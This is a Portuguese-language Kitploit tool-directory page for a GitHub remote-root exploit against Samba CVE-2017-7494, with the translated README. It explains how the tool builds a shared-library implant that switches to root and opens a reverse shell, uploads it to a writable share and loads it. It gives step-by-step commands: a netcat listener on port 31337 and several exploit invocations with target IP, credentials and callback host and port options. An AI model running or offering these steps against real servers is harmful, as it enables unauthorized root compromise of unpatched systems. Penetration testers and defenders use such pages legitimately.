Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-7494 — Exploit remoto de root para SAMBA CVE-2017-7494 que compila um payload de biblioteca compartilhada, o envia para um compartilhamento com permissão de escrita e aciona o carregamento para gerar um shell reverso como root. | Kitploit
Ferramentas/GitHubGitHub/sudlit/cve-2017-7494
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubsudlit/cve-2017-7494

CVE-2017-7494

Exploit remoto de root para SAMBA CVE-2017-7494 que compila um payload de biblioteca compartilhada, o envia para um compartilhamento com permissão de escrita e aciona o carregamento para gerar um shell reverso como root.

Ver Repositório
1há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-7494

Exploit remoto de root para a vulnerabilidade SAMBA CVE-2017-7494.

Detalhes

Este exploit está dividido em 2 partes:

  • Primeiro, ele compila um payload chamado "implant.c" e gera uma biblioteca (libimplantx32.so ou libimplantx64.so) que muda para o usuário root, se desanexa do processo pai e cria um reverse shell.
  • Segundo, ele encontra um compartilhamento gravável no host alvo especificado, envia a biblioteca com um nome aleatório e tenta carregá-la.

Desde que o alvo seja vulnerável e o payload seja correto para o sistema operacional e arquitetura do alvo, o exploit é 100% confiável.

Como usar

Na sua máquina, execute o seguinte comando:

root@kitploit:~
$ nc -p 31337 -l

Então, execute o exploit contra seu alvo e aguarde até que ele se conecte de volta ao seu Netcat:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

Se você fechar o reverse shell muito rápido, em vez de executar novamente o exploit enviando o módulo, etc... você pode simplesmente passar o caminho para o módulo que já foi enviado. Supondo que foi enviado para /shared/directory/ como "module.so", você executaria um comando como o seguinte:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

ATUALIZAÇÃO 25/11/2017 - Archivaldo

Agora você pode executar o exploit contra samba 3.5.0 e 3.6.0, você só precisa adicionar o argumento -o 1

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

Agora você pode usar seu próprio .so personalizado

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

Caso você precise executar este script a partir de uma máquina x86, a compilação dos binários do implant criará dois arquivos x86. Usando a flag -n 1 você pode desabilitar a compilação e copiar libimplantx64.so de outra máquina.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

Caso o samba esteja rodando apenas na porta 139. Você pode definir a porta do servidor remoto usando o argumento -p

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

NOTAS

Não dou mais suporte a isso.

-- Joxean Koret

Baixar ferramenta